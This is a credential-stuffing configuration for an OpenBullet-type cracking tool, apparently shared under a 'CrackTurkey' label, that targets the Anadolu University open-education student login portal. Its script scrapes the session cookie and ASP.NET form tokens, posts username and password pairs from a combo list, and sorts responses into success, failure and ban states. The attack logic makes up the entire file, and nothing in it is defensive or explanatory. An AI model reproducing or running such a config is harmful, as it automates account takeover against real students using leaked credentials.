[SETTINGS]
{
  "Name": "Anadolu Edu",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2020-10-14T15:47:39.9971765+03:00",
  "AdditionalInfo": "",
  "Author": "Kabadayı",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#CRACKTURKEY REQUEST GET "https://aof.anadolu.edu.tr/anasayfa/Default.aspx/" 
  

#CRACKTURKEY REQUEST GET "https://aof.anadolu.edu.tr/ogrenci/Login.aspx" 
  

#CRACKTURKEY REQUEST GET "https://login.anadolu.edu.tr/?url=http://aof.anadolu.edu.tr/ogrenci/Login.aspx" 
  

#CRACKTURKEY PARSE "<COOKIES(ASP.NET_SessionId)>" LR "" "" CreateEmpty=FALSE -> VAR "SessionId" 

#CRACKTURKEY PARSE "<SOURCE>" LR "name=\"__VIEWSTATE\" id=\"__VIEWSTATE\" value=\"" "\" />" CreateEmpty=FALSE -> VAR "VIEWSTATE" 

#CRACKTURKEY PARSE "<SOURCE>" LR "id=\"__EVENTVALIDATION\" value=\"" "\" />" CreateEmpty=FALSE -> VAR "EVENTVALIDATION" 

#CRACKTURKEY REQUEST POST "https://login.anadolu.edu.tr/login.aspx" 
  CONTENT "__LASTFOCUS=&__EVENTTARGET=doButton&__EVENTARGUMENT=&__VIEWSTATE=<VIEWSTATE>&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=<EVENTVALIDATION>&txtAccount=<USER>&txtPassword=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.anadolu.edu.tr" 
  HEADER "Connection: keep-alive" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Origin: https://login.anadolu.edu.tr" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: https://login.anadolu.edu.tr/login.aspx" 
  HEADER "Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "Accept-Encoding: gzip, deflate" 

#CRACKTURKEY KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "\" content=\"Anadolu Ãœniversitesi " 
  KEYCHAIN Success OR 
    KEY "\" content=\"Anadolu Ãœniversitesi " 
  KEYCHAIN Ban OR 
    KEY "Lütfen bir süre bekledikten sonra Internet tarayıcınızı yeniden başlatarak oturum açmak istediğiniz web sitesine geri dönün. " 

